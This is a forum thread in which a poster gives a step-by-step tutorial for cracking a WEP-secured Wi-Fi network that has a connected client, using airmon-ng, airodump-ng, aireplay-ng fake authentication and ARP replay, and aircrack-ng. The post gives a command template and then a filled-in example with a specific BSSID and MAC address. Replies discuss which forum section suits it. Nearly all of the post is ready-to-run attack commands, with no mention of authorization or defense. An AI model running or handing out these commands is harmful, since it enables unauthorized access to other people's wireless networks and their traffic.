Cracking wep with a connected client.

[killadaninja]

Cracking wep with a connected client.
This writing uses the dev wlan0, change where applicable.


airmon-ng stop mon0

airmon-ng start wlan0

airodump-ng --channel "insert AP`s channel here" --write SECRET --bssid "insert BSSID of AP here" mon0

aireplay-ng -1 30 -h "insert mac address of mon0 here, find this by typing macchanger -s wlan0" -a "insert AP`s BSSID here" mon0

aireplay-ng -3 -h "insert mac address of mon0 here" -b "insert AP`s BSSID here" mon0

aircrack-ng -a 1 -b "insert AP`s BSSID here" SECRET*.cap


Below is a real world example.

BSSID OF AP 00:25:3C:BB:35:A2
BROADCASTING ON CHANNEL 1
MAC ADDRESS OF mon0 00:11:22:33:44:55 (found by using "macchanger -s wlan0")
Note, mon0`s Mac will be the same of the Dev it was created on, in this case wlan0


airmon-ng stop mon0

airmon-ng start wlan0

airodump-ng --channel 1 --write SECRET --bssid 00:25:3C:BB:35:A2 mon0

aireplay-ng -1 30 -h 00:11:22:33:44:55 -a 00:25:3C:BB:35:A2 mon0

aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:25:3C:BB:35:A2 mon0

aircrack-ng -a 1 -b 00:25:3C:BB:35:A2 SECRET*.cap

[psychot3ch1]

Shouldnt this be posted in the tutorial section???

[crweedon]

i agree, the beginner forum is getting cluttered. it seems that the beginner forum is where everyone posts by default and then they hope someone else will sort it out later. but good on you for doing a write up...(even though this has been thoroughly covered)

[pure21]

Hm, i think its the correct place for this tutorial. Other tutorials have the same structure.
One i did not know: "Note, mon0`s Mac will be the same of the Dev it was created on, in this case wlan0"
so, thanks

greetings